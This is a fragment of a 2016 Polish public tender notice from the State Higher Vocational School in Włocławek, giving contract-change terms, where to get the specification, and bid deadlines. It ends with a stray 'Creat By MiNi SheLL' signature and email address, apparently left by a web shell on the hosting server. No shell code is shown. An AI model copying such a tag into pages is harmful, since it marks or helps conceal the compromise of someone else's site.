<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadku zaprzestania produkcji lub wyczerpania asortymentu zaoferowanego przez Wykonawcę. Zmiana polegać będzie na dostarczeniu takiej samej ilości innego produktu za cenę pierwotnie zaoferowaną przez Wykonawcę lub niższą. W przypadku zmiany, Wykonawca przedstawi propozycję nowego  produktu, zaś Zamawiający propozycje taką zaakceptuje</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Państwowa Wyższa Szkoła Zawodowa we Włocławku, ul. 3 Maja 17, 87-800 Włocławek, II piętro, pok. 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2016 godzina 11:45, miejsce: w siedzibie Zamawiającego: Państwowa Wyższa Szkoła Zawodowa we Włocławku, ul. 3 Maja 17, 87-800 Włocławek, Kancelaria Uczelni - I piętro, pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com